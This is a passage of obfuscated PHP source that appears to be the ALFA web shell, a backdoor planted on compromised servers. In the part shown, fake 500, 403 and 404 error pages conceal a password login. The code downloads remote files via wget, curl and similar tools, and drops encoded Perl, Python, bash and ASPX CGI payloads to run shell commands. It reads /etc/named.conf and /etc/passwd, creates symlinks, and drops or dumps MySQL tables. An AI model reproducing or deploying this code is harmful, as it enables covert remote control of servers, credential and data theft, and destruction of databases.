$_SERVER["\120\110\x50\x5f\123\105\114\x46"]); } echo "\74\x68\x74\155\154\76\x3c\150\145\x61\144\76\x3c\x74\x69\x74\x6c\145\x3e\x35\x30\x30\40\x49\156\x74\x65\162\156\141\x6c\40\x53\x65\x72\x76\145\162\x20\105\x72\162\157\x72\74\57\x74\x69\164\154\145\76\74\57\x68\x65\141\144\x3e\74\x62\157\144\171\76\74\150\61\x3e\111\156\164\x65\162\x6e\141\154\x20\123\x65\x72\x76\x65\x72\40\105\162\162\157\162\74\x2f\x68\61\x3e\74\160\x3e\x54\150\x65\x20\163\145\x72\166\145\x72\x20\x65\156\x63\x6f\x75\x6e\x74\x65\162\145\x64\x20\141\156\40\x69\156\x74\x65\162\156\141\154\40\x65\162\x72\157\x72\x20\157\x72\x20\155\x69\163\x63\157\x6e\x66\x69\x67\x75\x72\x61\164\x69\x6f\156\x20\x61\x6e\144\40\167\x61\x73\40\165\x6e\141\x62\154\x65\x20\164\x6f\40\x63\157\x6d\160\154\145\x74\145\x20\171\x6f\165\x72\40\x72\x65\161\165\145\x73\x74\x2e\x3c\57\160\76\74\x70\76\120\x6c\145\141\163\x65\40\x63\x6f\156\x74\x61\x63\x74\x20\164\150\x65\x20\x73\145\x72\x76\145\162\x20\x61\x64\x6d\151\156\x69\163\164\162\x61\164\x6f\x72\x2c\40" . $_SERVER["\123\105\x52\x56\x45\x52\137\101\104\115\111\116"] . "\40\x61\x6e\x64\x20\151\x6e\x66\x6f\x72\x6d\40\x74\x68\x65\155\x20\x6f\x66\40\x74\x68\145\x20\164\151\x6d\x65\x20\x74\x68\145\40\145\162\x72\157\162\40\x6f\143\143\x75\x72\x72\x65\x64\54\40\x61\x6e\144\x20\141\156\x79\164\150\151\x6e\x67\x20\x79\157\165\x20\155\x69\147\x68\x74\x20\150\x61\166\145\40\x64\157\156\145\40\164\x68\141\164\40\155\x61\171\x20\x68\141\166\145\40\143\141\x75\x73\145\144\x20\164\x68\145\40\x65\x72\x72\x6f\x72\56\x3c\57\160\x3e\x3c\160\76\x4d\x6f\162\x65\40\151\156\x66\x6f\162\x6d\x61\x74\x69\157\156\x20\141\x62\x6f\165\164\x20\x74\150\151\163\x20\145\162\x72\157\162\40\155\141\171\x20\x62\145\x20\141\166\141\151\154\141\142\x6c\145\40\x69\x6e\x20\164\x68\145\40\163\x65\x72\166\145\x72\x20\x65\x72\x72\157\x72\x20\x6c\157\147\x2e\x3c\57\160\x3e\x3c\x68\162\76" . $SERVER_SIG . "\74\x2f\142\x6f\x64\171\x3e\x3c\57\x68\164\155\x6c\76" . $Eform; die; } } elseif ($config["\x41\x6c\146\x61\x4c\157\147\151\x6e\x50\141\x67\x65"] == "\64\60\x33") { if (@$_COOKIE["\101\x6c\146\x61\120\141\163\x73"] != @md5($config["\x41\x6c\x66\141\x50\x61\163\163"])) { if (@md5($_POST["\x70\x61\163\x73\167\x6f\x72\144"]) == $config["\x41\x6c\146\141\120\141\x73\x73"]) { __alfa_set_cookie("\101\154\146\x61\125\163\x65\162", $config["\101\x6c\146\141\125\163\145\x72"]); __alfa_set_cookie("\101\x6c\x66\141\120\x61\x73\163", @md5($config["\x41\x6c\146\x61\x50\141\163\163"])); @header("\x6c\x6f\143\x61\x74\151\157\x6e\72\x20" . $_SERVER["\x50\110\120\x5f\123\x45\114\106"]); } echo "\x3c\x68\164\155\154\76\74\x68\145\141\144\x3e\74\164\151\x74\x6c\x65\x3e\64\60\x33\x20\106\157\162\x62\151\x64\144\x65\156\x3c\x2f\164\151\x74\x6c\145\76\74\x2f\x68\x65\x61\144\x3e\74\x62\157\x64\171\76\74\150\x31\x3e\x46\157\x72\x62\x69\144\x64\145\156\x3c\x2f\150\x31\76\74\160\x3e\131\x6f\165\40\x64\157\156\47\164\x20\x68\x61\x76\x65\x20\160\145\x72\x6d\x69\163\x73\x69\157\x6e\x20\x74\157\x20\141\143\143\145\x73\163\40" . $_SERVER["\x50\110\120\137\x53\105\x4c\x46"] . "\x20\x6f\x6e\x20\x74\150\x69\x73\40\x73\x65\162\166\145\x72\x2e\x3c\57\160\x3e\x3c\150\x72\x3e" . $SERVER_SIG . "\74\x2f\142\x6f\144\171\x3e\74\x2f\x68\x74\x6d\154\x3e" . $Eform; die; } } elseif ($config["\x41\154\x66\x61\114\x6f\x67\151\156\x50\141\147\145"] == "\x34\60\x34") { if (@$_COOKIE["\101\154\x66\x61\x50\x61\163\x73"] != @md5($config["\x41\x6c\x66\141\x50\141\x73\163"])) { if (@md5($_POST["\160\141\x73\163\167\x6f\162\x64"]) == $config["\101\x6c\146\x61\x50\141\163\x73"]) { __alfa_set_cookie("\101\154\x66\x61\x55\x73\x65\162", $config["\x41\x6c\146\x61\x55\163\145\162"]); __alfa_set_cookie("\101\x6c\x66\x61\x50\x61\x73\x73", @md5($config["\x41\154\146\141\120\141\x73\x73"])); @header("\x6c\157\143\141\x74\151\x6f\156\x3a\x20" . $_SERVER["\120\x48\120\x5f\123\105\114\106"]); } echo "\x3c\164\x69\x74\x6c\x65\76\x34\60\64\x20\116\x6f\x74\x20\x46\x6f\x75\x6e\144\74\x2f\x74\151\164\154\145\x3e\74\150\61\76\116\x6f\x74\x20\106\x6f\165\156\144\x3c\57\150\x31\76\74\x70\76\x54\x68\145\x20\x72\x65\161\165\x65\x73\x74\145\144\x20\x55\122\114\x20" . $_SERVER["\x50\110\120\x5f\x53\105\x4c\106"] . "\40\167\x61\x73\x20\x6e\157\x74\x20\x66\157\165\x6e\x64\x20\x6f\x6e\40\x74\150\x69\163\x20\x73\145\x72\166\145\x72\x2e\x3c\x62\x72\76\x3c\x62\x72\76\x41\144\144\151\x74\x69\157\156\x61\x6c\x6c\171\54\x20\141\40\64\60\x34\x20\x4e\157\x74\40\106\x6f\165\156\x64\x20\145\162\x72\x6f\162\x20\167\x61\x73\x20\x65\156\143\x6f\x75\x6e\164\x65\162\145\x64\40\x77\150\151\154\145\40\164\162\171\151\156\x67\x20\164\x6f\x20\x75\163\145\40\141\156\x20\x45\162\162\157\162\104\x6f\x63\x75\155\145\156\164\x20\x74\157\40\x68\x61\x6e\144\x6c\x65\40\164\x68\x65\x20\162\145\x71\x75\x65\x73\x74\56\x3c\x2f\160\76\74\x68\162\x3e" . $SERVER_SIG . "\74\x2f\x62\x6f\x64\x79\76\x3c\57\x68\x74\x6d\x6c\x3e" . $Eform; die; } } } goto l9Nci; jPDeP: function __download($url, $path = false) { if (!preg_match("\x2f\133\x61\55\x7a\135\53\72\134\57\x5c\57\x2e\53\x2f", $url)) { return false; } $saveas = basename(rawurldecode($url)); if ($path) { $saveas = $path . $saveas; } if ($content = __read_file($url)) { if (@is_file($saveas)) { @unlink($saveas); } if (__write_file($saveas, $content)) { return true; } } $buff = alfaEx("\x77\x67\x65\x74\40" . $url . "\x20\55\117\40" . $saveas); if (@is_file($saveas)) { return true; } $buff = alfaEx("\143\165\x72\x6c\40" . $url . "\x20\55\157\x20" . $saveas); if (@is_file($saveas)) { return true; } $buff = alfaEx("\154\x77\x70\x2d\144\x6f\167\156\x6c\157\141\x64\40" . $url . "\x20" . $saveas); if (@is_file($saveas)) { return true; } $buff = alfaEx("\154\x79\156\x78\40\x2d\x73\x6f\x75\162\143\145\40" . $url . "\x20\76\40" . $saveas); if (@is_file($saveas)) { return true; } $buff = alfaEx("\107\x45\x54\40" . $url . "\x20\76\x20" . $saveas); if (@is_file($saveas)) { return true; } $buff = alfaEx("\x6c\x69\156\153\163\40\55\163\x6f\165\x72\x63\x65\x20" . $url . "\40\76\40" . $saveas); if (@is_file($saveas)) { return true; } $buff = alfaEx("\146\145\x74\x63\150\x20\x2d\x6f\40" . $saveas . "\x20\55\x70\x20" . $url); if (@is_file($saveas)) { return true; } return false; } goto gNx00; uKA69: if (strtolower(substr(PHP_OS, 0, 3)) == "\x77\x69\x6e") { $GLOBALS["\163\171\163"] = "\x77\x69\156"; } else { $GLOBALS["\163\171\x73"] = "\165\x6e\x69\170"; } goto rvAhm; e_ypN: function _alfa_cgicmd($cmd, $lang = "\160\145\162\154", $set_cookie = false) { if (!$GLOBALS["\x44\x42\137\116\x41\115\105"]["\143\147\x69\137\141\160\151"]) { return ''; } if (isset($_COOKIE["\141\x6c\x66\x61\143\x67\151\141\x70\151\x5f\x6d\157\x64\145"])) { return ''; } $cmd_pure = $cmd; $is_curl = function_exists("\x63\x75\162\154\137\x76\145\162\x73\151\157\156"); $is_socket = function_exists("\x66\163\x6f\143\153\x6f\160\x65\156"); if ($is_curl || $is_socket) { $recreate = false; if (isset($_COOKIE["\141\x6c\x66\x61\143\x67\x69\x61\160\151"])) { if (!@file_exists("\x61\154\146\x61\143\x67\x69\141\x70\x69\x2f" . $_COOKIE["\141\x6c\x66\141\x63\x67\151\141\x70\151"] . "\56\141\x6c\146\141")) { $recreate = true; $lang = $_COOKIE["\141\154\146\141\143\x67\151\141\x70\151"]; } } if (!isset($_COOKIE["\x61\x6c\x66\x61\143\x67\x69\141\160\x69"]) || $recreate) { @chdir(dirname($_SERVER["\x53\x43\x52\111\120\124\137\x46\111\x4c\105\116\101\x4d\105"])); $perl = "\152\x5a\106\122\124\x38\111\x77\x46\x49\130\x66\x2f\122\x58\130\117\161\127\116\x73\x4b\x6f\170\x50\154\101\167\x52\154\151\x45\122\x49\x62\113\x39\x45\125\115\x47\144\163\106\107\x72\x59\x79\x74\x32\x49\x6b\171\57\x7a\164\144\x6b\x4d\154\x4a\152\x37\x34\x63\160\x4b\145\145\x38\x35\63\153\x39\66\104\x66\142\67\117\x55\x6a\x36\x56\151\x69\x65\x59\x52\147\104\x51\x36\x46\x64\117\x74\x41\162\x38\x69\105\71\x39\106\x63\x5a\x53\x37\x61\x30\172\x68\x45\106\57\64\x44\x53\142\x31\63\x36\x47\x46\53\x63\x69\123\x61\x58\x53\x51\104\x6f\162\160\x56\110\x70\x68\164\64\x6b\x32\x41\123\x4e\67\65\x6f\166\144\x42\x79\x4e\61\126\x67\122\x49\x57\146\x55\143\164\x79\x6e\166\120\142\147\63\x44\70\x36\x49\62\70\171\x63\x4c\x7a\145\x73\x46\163\x72\101\x46\53\x42\x33\101\x31\110\110\x6d\x46\x35\166\101\106\161\171\124\160\131\123\x39\167\x59\x66\x66\x4d\152\157\61\111\170\153\x61\x49\x66\60\x70\110\130\x37\142\165\126\131\141\122\151\x64\x59\x61\x75\x35\x37\x6a\x65\65\116\132\170\x62\67\x78\145\x72\x57\104\151\123\151\x70\x6f\x51\65\x5a\x45\125\x6c\116\x2b\170\x4c\x2f\161\x73\65\x55\x42\x42\101\166\x7a\x41\110\157\x43\164\x67\x33\x57\147\142\106\x7a\115\x33\x75\x32\65\x41\165\60\x50\171\x44\x6a\64\x32\x4d\x4f\146\x43\67\157\x62\152\146\142\x6b\x64\160\x62\x55\x70\x6d\x75\167\x78\153\x54\132\127\150\x62\117\66\123\x32\172\x58\152\x69\x42\x30\164\x4b\101\154\113\110\102\142\65\x54\66\65\x51\170\120\x6b\144\x52\x51\166\x36\122\x6b\x69\x6f\x76\x65\x51\x58\131\142\x53\104\152\x45\x77\112\171\102\x6a\x54\105\x6d\x56\121\131\60\160\70\x70\x59\x37\x2b\124\x4a\126\x77\125\x35\142\x63\x61\154\x77\122\x78\x53\101\x71\127\x62\171\x38\122\x59\162\101\113\x63\x54\x4b\164\162\x76\115\61\x58\62\103\167\x4e\x41\x6d\x62\x74\112\111\x55\x4c\x34\156\x49\x4e\x70\156\x47\155\x50\x34\126\162\x56\x44\163\x2b\x36\157\x74\130\150\x57\x4b\64\150\115\x3d"; $py = "\142\x5a\104\102\123\70\x4d\x77\x47\115\x58\x50\x79\61\x39\x52\x36\66\x45\164\x7a\x68\x52\x6b\x37\x44\x41\x33\x4c\x31\x72\x78\x49\164\x4f\x74\63\147\x61\x6a\x54\x62\66\164\167\x54\x51\112\171\x64\145\x78\111\146\67\x76\112\161\x76\115\151\122\65\103\171\x48\166\x76\71\63\152\x6b\70\151\x4c\x76\156\x4d\61\162\157\130\112\x7a\167\x45\131\162\147\x76\x59\x77\111\x51\x50\122\107\155\x30\x78\x59\x6c\165\x42\71\127\x31\x2f\125\x56\102\x56\114\x53\110\x4e\103\117\167\x5a\x47\120\121\160\125\x7a\154\x48\166\161\x50\141\x44\130\x31\163\x57\106\143\117\x78\151\117\171\60\142\x61\x4e\x5a\147\x47\x6b\152\x77\x49\x6b\x58\66\113\x32\x31\x52\132\x53\x55\104\x74\x68\x74\132\160\71\x4a\111\x76\151\x39\141\x31\x59\x6c\x75\166\156\x6f\x6e\171\x61\x50\171\123\x54\x35\107\127\x2b\114\112\x50\120\x6a\x4c\103\x57\x65\172\x49\125\60\x43\x33\147\x72\x70\111\144\x70\111\153\x58\105\62\70\61\167\x4e\x37\x2f\115\131\x50\163\x62\x57\117\106\167\151\x69\x2b\61\167\x70\102\x34\124\x55\145\104\105\167\121\x39\x70\147\63\x32\x4d\x71\x56\130\x61\154\167\x59\x69\111\62\x6b\x61\x38\x4c\70\x34\57\x35\x66\x6a\x47\164\170\171\x4d\x4f\x54\x48\x4e\x49\152\x33\x58\132\126\x54\x77\61\106\x75\65\151\x4d\x6d\x43\116\153\x48\x7a\x74\x6b\x41\x73\x31\x6a\105\64\120\63\141\x46\146\157\150\60\x31\62\157\103\66\123\x66\x2f\x57\x74\x44\172\x4c\146\x74\x47\125\x53\145\x33\x43\102\167\64\x73\x75\105\x34\x47\x2f\x72\171\117\127\x71\150\64\145\157\x34\x45\70\x63\124\x30\x61\63\x75\x53\x4f\x72\x54\x43\x2f\113\152\170\116\104\x2b\x4f\57\x51\111\75"; $bash = "\162\x56\x52\144\x6a\x35\160\x41\106\x48\62\x75\x76\x2b\111\66\x44\x47\141\x31\111\x61\171\142\160\147\71\141\155\162\x52\142\157\160\x74\x59\x62\126\x33\66\60\112\x51\107\127\x52\151\x46\x79\120\111\x35\127\162\145\x55\x2f\71\x35\150\x6f\x43\x79\152\163\146\x46\150\x35\x32\x6e\155\x33\x6e\115\57\x7a\165\x54\143\x4b\x33\x58\x56\x42\172\x39\125\x48\x2b\x7a\115\66\x78\x44\x48\151\60\101\150\147\107\66\x6a\153\x4a\113\x51\x4b\166\x51\x70\112\151\117\147\x35\x45\x42\x56\152\x7a\x34\x47\x5a\x6d\151\107\161\x4c\x50\x65\x68\x51\x37\61\157\x78\x43\143\152\x57\71\x74\103\x4c\x57\53\114\117\64\x4e\141\62\53\156\x32\x56\125\x2f\x37\167\101\x37\120\x77\104\150\x70\x66\67\x31\x6d\70\67\163\x6e\x33\126\x6a\x75\166\x69\105\x6f\113\163\102\x4b\x6f\x45\x49\146\x6b\x4b\x76\102\x79\155\x68\x75\x7a\x53\163\60\x56\x31\x51\146\x72\115\121\106\x72\104\70\142\164\x30\x62\x79\67\x76\65\x78\x44\x71\110\x35\143\152\142\170\x64\172\121\65\64\131\x31\x30\x2b\143\124\x59\x79\162\x43\x58\161\130\x45\x64\x6b\107\x5a\167\170\105\113\124\x74\114\x7a\x6a\110\126\x55\x49\x64\x4a\171\x69\x52\x4f\65\x68\110\x46\x36\160\157\x51\154\x55\105\111\x43\167\65\x4f\145\x67\x73\151\x78\101\71\147\x44\102\131\x2b\x2f\x71\x59\x5a\x77\x50\154\x54\x56\61\x79\x6f\125\163\157\171\x34\67\x5a\146\156\102\x36\122\x4d\x6b\153\165\x30\x41\107\x56\104\x34\x52\157\125\155\172\x48\x4a\141\126\110\71\152\x63\x78\131\x6a\x4d\107\116\x4f\x4c\x77\70\x2b\x7a\114\116\166\x6d\101\x49\127\124\x62\154\x51\131\x45\141\x44\x79\71\x41\x70\131\x48\x63\163\166\x6e\162\103\67\x4a\124\x6a\x34\122\x4e\x52\110\153\x38\x6a\x55\x46\107\61\x36\117\x62\x51\x6a\x42\130\x42\132\147\x56\103\145\x61\66\x49\67\x54\x36\x70\170\x4f\x54\156\121\x50\x4f\x76\127\x4c\126\64\x4e\x59\x2b\x76\67\160\x52\123\120\151\106\x51\66\x75\167\57\63\x77\x33\x55\65\x47\x6f\156\x2f\113\172\101\x77\157\x33\132\172\x34\x37\147\122\x69\62\x37\x4d\163\172\x62\156\x50\163\x6a\101\x41\145\147\166\x39\x4d\x62\161\x49\x62\146\141\110\x33\122\155\x52\65\x57\x77\132\106\114\132\61\x45\117\63\142\x30\122\x4f\x72\152\x63\x66\x4d\163\x6c\123\120\155\120\x70\x6d\x44\x43\171\x70\172\70\116\156\171\154\x66\x64\70\x44\x78\x38\x58\170\166\x52\106\53\x62\60\x4d\x68\141\x53\x34\x6e\101\x62\x4a\x62\111\x64\x66\x4d\x73\x39\146\60\53\x71\155\111\x63\101\x44\x45\x43\145\x6d\x72\160\x77\x63\x6a\60\x66\x4d\x43\70\x70\x79\x72\x7a\x30\x5a\62\x39\111\131\x79\67\114\x57\x4e\x6e\114\x5a\170\x74\x4a\101\141\71\155\x71\x64\x69\x55\x63\103\53\110\154\x33\x68\157\x69\131\120\x50\171\131\124\x5a\x44\157\110\104\x6c\132\151\162\x67\x4c\x61\x6a\61\x49\x4f\x47\163\x4a\x6d\167\x4b\x70\115\x67\150\x6a\154\114\113\x33\106\165\153\157\x5a\127\x77\121\143\x42\x45\x65\x47\x2b\151\106\122\x49\110\157\170\155\105\154\166\66\x35\x74\x6f\104\x56\67\151\x51\67\153\x6a\65\160\x2b\111\161\120\x44\x33\131\145\x58\x66\147\104\142\x45\x57\x54\x74\x32\71\101\x55\x61\x72\125\57\x57\160\144\116\170\x69\x50\x4f\116\165\x7a\161\x48\x4b\x70\166\x34\164\124\x38\164\65\x30\125\111\x64\x31\x46\142\x42\144\167\x57\163\x55\x4c\142\x39\x61\101\x2f\x34\103"; $aspx = "\152\x5a\116\144\141\x39\163\x77\106\x49\141\166\153\61\70\150\116\x41\x6f\117\x41\x58\x64\163\x6f\x7a\144\x4c\x79\162\x72\125\113\131\x61\x52\x6c\x72\x69\116\116\60\111\x75\x46\120\166\x45\x46\142\x55\x6c\67\60\152\117\102\62\x50\71\67\x54\x31\123\x50\x42\x6f\70\x79\156\x5a\x6c\123\x2b\144\65\x33\x2f\x50\x68\x34\x39\x48\x5a\x46\63\x59\x6e\103\155\x44\146\x68\103\157\x61\x65\x68\156\172\x79\124\x76\x4f\x49\151\130\127\x4a\x53\x77\153\x37\102\111\162\114\106\61\165\122\107\x6d\101\x73\x37\120\114\x2f\157\147\125\143\126\x56\x72\164\x47\167\x6d\x4b\152\x43\61\171\x43\151\145\x48\x49\x79\x46\113\153\170\150\x48\x54\x37\105\x37\152\110\x52\x79\x71\111\165\172\142\x38\x31\61\x31\x49\x55\x53\x68\163\x72\163\x2f\x2b\x41\64\x31\x76\120\105\x4e\x54\166\x47\131\x74\x53\x46\x53\171\162\x63\152\x5a\x6d\143\57\152\132\147\114\110\150\x56\107\x4f\61\x35\110\x54\x48\126\x35\x39\146\153\125\146\x49\156\166\66\x47\63\x4b\63\x48\x35\x43\x5a\157\153\124\110\152\66\143\146\x5a\144\156\x32\x7a\x2b\x43\x43\53\172\53\157\146\x31\x62\67\143\126\116\x4f\144\x57\x4c\167\x66\x38\x38\107\166\x66\161\x2b\x33\x50\x6c\150\x59\x72\x6c\x67\x75\162\103\104\104\x74\x69\160\161\144\147\164\111\166\161\x69\x72\162\x38\114\x41\170\x61\x66\105\x4a\167\x36\157\x6a\x67\110\65\71\x34\64\61\x74\166\x51\x39\x37\107\x31\x34\154\x55\172\x69\x4f\x46\113\132\172\x6f\153\67\x6e\x73\x49\142\x73\113\x33\x4f\x32\x5a\x4f\x51\x6c\x48\145\157\115\x7a\x43\x47\x31\x61\x52\130\x73\107\x50\164\117\x66\103\x32\144\x55\x69\x66\x42\x32\62\x73\x4e\152\161\143\111\x4e\x43\130\x6d\x75\154\x55\x71\x6c\172\x76\151\114\142\x59\121\x42\x65\141\x79\x68\114\x63\x55\103\x6e\x73\132\x68\x54\x43\110\x6e\x69\x58\x75\143\x4b\x69\161\125\x42\132\x34\x36\104\x7a\x6a\x48\x45\62\144\x44\x50\165\131\147\70\x47\x6b\153\143\157\171\62\x67\120\x57\x57\117\144\x6f\71\x2b\x52\114\x6a\x61\x48\x58\103\112\x6b\x31\x4a\150\121\x75\x63\104\70\x74\162\106\61\131\71\70\157\162\167\x74\x48\151\x42\x72\x66\x59\x46\x4f\116\124\x7a\x53\x71\x61\x79\x2f\121\x65\x50\x44\126\x6e\x6a\x59\x54\x48\x41\146\131\162\x6f\104\53\153\71\x64\110\124\60\x71\150\160\103\x4b\57\61\65\x48\113\147\167\106\x31\x2b\150\x72\x32\171\x55\53\152\172\156\164\x4f\53\66\151\126\147\124\x42\x46\141\x53\x48\x67\123\66\116\x4c\x32\x45\x6f\x6a\x36\130\x64\x35\x46\162\x56\x63\152\x57\161\105\123\172\x34\x38\x70\x68\166\171\x30\x62\153\x2f\117\53\x33\166\x50\151\x33\165\103\x77\75\x3d"; if ($lang == "\x70\145\x72\154") { $source = $perl; } elseif ($lang == "\x70\171") { $source = $py; } else { $source = $bash; } if ($lang == "\x61\163\160\x78") { alfaWriteTocgiapi("\141\163\x70\170\56\x61\x73\160\x78", $aspx); } else { alfaWriteTocgiapi($lang . "\56\x61\x6c\x66\x61", $source); } alfacgihtaccess("\143\x67\x69", "\x61\x6c\x66\141\x63\x67\x69\141\x70\151\x2f"); } else { $lang = $_COOKIE["\x61\154\x66\x61\x63\x67\x69\141\x70\x69"]; } $cgi_ext = "\x2e\141\154\146\141"; if ($lang == "\x61\163\160\170") { $cgi_ext = "\x2e\x61\x73\x70\x78"; } $cgi_url = __ALFA_DATA_FOLDER__ . "\x2f\x61\x6c\146\x61\143\147\151\141\160\x69\57" . $lang . $cgi_ext; $cmd = "\x63\150\x65\143\x6b\75\x57\x33\116\x76\142\107\126\62\141\x58\116\160\131\155\x78\x6c\x66\x6d\106\167\141\126\x30\x3d\x26\143\155\144\75" . __ZW5jb2Rlcg("\x63\144\x20" . $GLOBALS["\x63\x77\x64"] . "\x3b" . $cmd); if ($is_curl) { $address = ($_SERVER["\x53\x45\122\x56\105\x52\137\120\x4f\122\x54"] == 443 ? "\150\164\x74\x70\163\x3a\x2f\57" : "\150\x74\164\160\x3a\57\57") . $_SERVER["\123\105\x52\x56\105\x52\137\x4e\x41\x4d\105"] . dirname($_SERVER["\122\x45\x51\125\105\123\x54\x5f\x55\122\x49"]) . "\x2f" . $cgi_url; $post = new AlfaCURL(); $data = $post->Send($address, "\x70\x6f\163\164", $cmd); } elseif ($is_socket) { $server = $_SERVER["\x53\x45\122\126\x45\122\x5f\x4e\x41\x4d\105"]; $uri = dirname($_SERVER["\122\x45\121\x55\x45\123\124\x5f\125\x52\111"]) . "\57" . $cgi_url; $data = _alfa_fsockopen($server, $uri, $cmd); } $out = ''; if (strpos($data, "\133\x73\157\x6c\145\166\151\x73\151\142\154\145\x7e\x61\160\x69\x5d") !== false && strpos($data, "\133\x73\x6f\x6c\x65\166\x69\163\151\x62\x6c\x65\x7e\141\x70\x69\135\x3c\x70\162\145\76\42\x2b\157\165\x74\x70\165\x74\53\42\74\57\160\162\x65\76") === false) { if ($set_cookie) { __alfa_set_cookie("\x61\x6c\x66\141\x63\x67\x69\141\x70\151", $lang); } if (@preg_match("\57\x3c\160\x72\x65\76\x28\56\x2a\77\x29\x3c\x5c\x2f\x70\162\x65\x3e\57\x73", $data, $res)) { $out = $res[1]; } } elseif ($lang == "\x70\145\x72\x6c") { return _alfa_cgicmd($cmd_pure, "\160\x79", $set_cookie); } elseif ($lang == "\x70\171") { return _alfa_cgicmd($cmd_pure, "\142\141\x73\x68", $set_cookie); } elseif ($lang == "\x62\x61\163\150" && $GLOBALS["\x73\x79\x73"] == "\167\151\x6e") { return _alfa_cgicmd($cmd_pure, "\x61\163\160\170", $set_cookie); } else { if ($set_cookie) { __alfa_set_cookie("\141\x6c\x66\x61\x63\x67\151\x61\160\151\137\x6d\157\x64\145", "\x6f\146\146"); } } return trim($out); } else { return ''; } } goto BIHg8; CUIqF: $default_use_ajax = true; goto vo0SR; fAaD3: $aztJtafUXm = "\x63\x68\141" . "\x72" . "\x43" . "\x6f" . "\x64" . "\145" . "\x41" . "\164" . ''; goto mG6El; NOAKT: function Alfa_Create_A_Tag($action, $vals) { $nulls = array(); foreach ($vals as $key => $val) { echo "\x3c\x61\x20\x68\x72\x65\146\75\x6a\x61\166\141\x73\x63\162\x69\160\x74\x3a\166\x6f\151\x64\x28\60\51\x20\x6f\156\x63\x6c\x69\143\153\75\42\x67\50\47" . $action . "\47\54"; for ($i = 1; $i <= $val[1] - 1; $i++) { $nulls[] = "\156\165\x6c\154"; } $f = implode("\x2c", $nulls); echo $f . "\54\x27" . $val[0] . "\x27\x29\73\x72\145\164\165\162\x6e\x20\146\141\x6c\x73\145\73\x22\76\174\x20" . $key . "\x20\174\40\74\x2f\x61\76"; unset($nulls); } } goto I2i3T; LUHcx: function alfaGetDomains($state = false) { $state = "\x6e\141\155\x65\144\x2e\x63\157\x6e\x66"; $lines = array(); $lines = _alfa_file("\x2f\x65\x74\143\57\156\x61\x6d\x65\144\56\x63\x6f\156\146"); if (!$lines) { $lines = @scandir("\x2f\145\164\143\57\166\141\x6c\151\x61\163\145\x73\57"); $state = "\x76\x61\154\x69\x61\163\145\163"; if (!$lines) { $lines = @scandir("\57\x76\141\x72\x2f\x6e\x61\x6d\x65\x64"); $state = "\156\141\155\145\x64"; if (!$lines && $state) { $lines = _alfa_file("\x2f\x65\x74\143\x2f\x70\141\x73\x73\x77\144"); $state = "\160\141\163\163\x77\144"; } } } return array("\154\x69\156\145\x73" => $lines, "\x73\164\x61\164\x65" => $state); } goto NKFok; V1ePl: function _alfa_symlink($target, $link) { $phpsym = function_exists("\163\x79\x6d\154\151\x6e\153"); if ($phpsym) { @symlink($target, $link); } else { alfaEx("\154\156\x20\55\163\40\x27" . addslashes($target) . "\x27\x20\47" . addslashes($link) . "\47"); } } goto AkVgx; W3QA9: function alfaSql_manager_api() { $db = $_POST["\x61\x6c\x66\141\x31"]; $type = $_POST["\x61\x6c\x66\x61\x32"]; $sql_count = $_POST["\x61\x6c\146\x61\63"] == "\164\162\x75\x65" ? true : false; $db = @json_decode($db, true); $conn = @mysqli_connect($db["\150\x6f\163\x74"], $db["\165\x73\x65\x72"], $db["\160\x61\x73\163"], $db["\x64\142"]); @mysqli_set_charset($conn, "\x75\164\146\x38"); if ($conn) { if ($type == "\154\x6f\x61\144\x5f\141\x6c\154\x5f\x74\x61\142\154\x65\x73") { $tables = array(); $q_tables = @mysqli_query($conn, "\x53\105\114\105\x43\x54\40\x60\164\141\142\154\145\137\163\x63\x68\x65\x6d\141\x60\54\x20\140\164\x61\142\154\145\x5f\x6e\x61\155\x65\x60\x20\x46\x52\117\x4d\40\x60\x69\x6e\146\157\162\x6d\141\164\151\x6f\156\137\x73\x63\x68\145\x6d\141\140\56\x60\x74\141\142\x6c\x65\x73\140\x20\127\x48\x45\122\105\40\x60\x74\x61\x62\154\145\137\x73\x63\150\x65\x6d\141\140\x20\x49\116\40\x28\x27" . implode("\x27\54\47", $db["\x64\141\164\x61\142\141\x73\x65\163"]) . "\47\x29\73"); $count = 0; while ($row = @mysqli_fetch_assoc($q_tables)) { if ($sql_count) { $count_q = @mysqli_query($conn, "\123\x45\114\105\103\x54\40\x43\x4f\x55\x4e\124\50\52\x29\x20\106\x52\x4f\115\x20\x60" . $row["\x74\141\x62\154\145\137\x73\143\150\x65\x6d\141"] . "\140\56\x60" . $row["\x74\x61\142\x6c\x65\x5f\156\141\155\x65"] . "\140"); if ($count_q) { $count = @mysqli_fetch_row($count_q); $count = $count[0]; } } $tables[$row["\164\x61\x62\x6c\x65\x5f\x73\143\x68\x65\155\141"]][] = array("\156\141\155\x65" => $row["\x74\x61\x62\154\145\137\156\x61\x6d\145"], "\x63\x6f\x75\x6e\164" => (int) $count); } foreach ($db["\x64\x61\x74\x61\x62\x61\163\145\x73"] as $db) { if (!isset($tables[$db])) { $tables[$db] = null; } } echo @json_encode($tables); } elseif ($type == "\x64\x75\155\x70\x5f\x64\162\157\160") { if ($db["\x6d\x6f\x64\x65"] == "\144\x72\157\x70") { foreach ($db["\x74\x61\x62\154\x65\x73"] as $table) { @mysqli_query($conn, "\x44\x52\x4f\x50\x20\124\101\x42\x4c\105\40\x60" . $table . "\x60\x3b"); } $tables = array(); $q_tables = @mysqli_query($conn, "\x53\x48\117\127\x20\x54\x41\x42\x4c\x45\x53\x3b"); $count = 0; while ($row = @mysqli_fetch_array($q_tables)) { if ($sql_count) { $count_q = @mysqli_query($conn, "\x53\x45\114\105\x43\124\x20\103\117\x55\116\x54\50\52\x29\40\106\x52\117\x4d\40\140" . $row[0] . "\140"); if ($count_q) { $count = @mysqli_fetch_row($count_q); $count = $count[0]; } } $tables[] = array("\156\x61\155\145" => $row[0], "\143\x6f\x75\x6e\x74" => (int) $count); } echo @json_encode($tables); } else { if (strlen(alfaEx("\155\x79\163\x71\154\144\165\155\x70")) > 0) { alfaEx("\155\x79\x73\161\x6c\x64\165\x6d\x70\40\x2d\x2d\163\x69\x6e\147\x6c\x65\x2d\164\162\x61\x6e\x73\x61\143\164\151\157\x6e\x20\55\x2d\x68\x6f\x73\164\x3d\x22" . $db["\150\x6f\x73\164"] . "\42\40\55\x2d\x75\163\145\162\x3d\42" . $db["\x75\x73\x65\162"] . "\x22\40\55\x2d\160\x61\x73\x73\167\157\x72\x64\x3d\x22" . $db["\x70\141\163\x73"] . "\x22\40" . $db["\x64\x62"] . "\x20" . implode("\40", $db["\x74\x61\142\x6c\145\163"]) . "\x20\40\x3e\40" . $db["\x64\x75\155\160\x5f\146\x69\x6c\x65"]); } else { $fp = 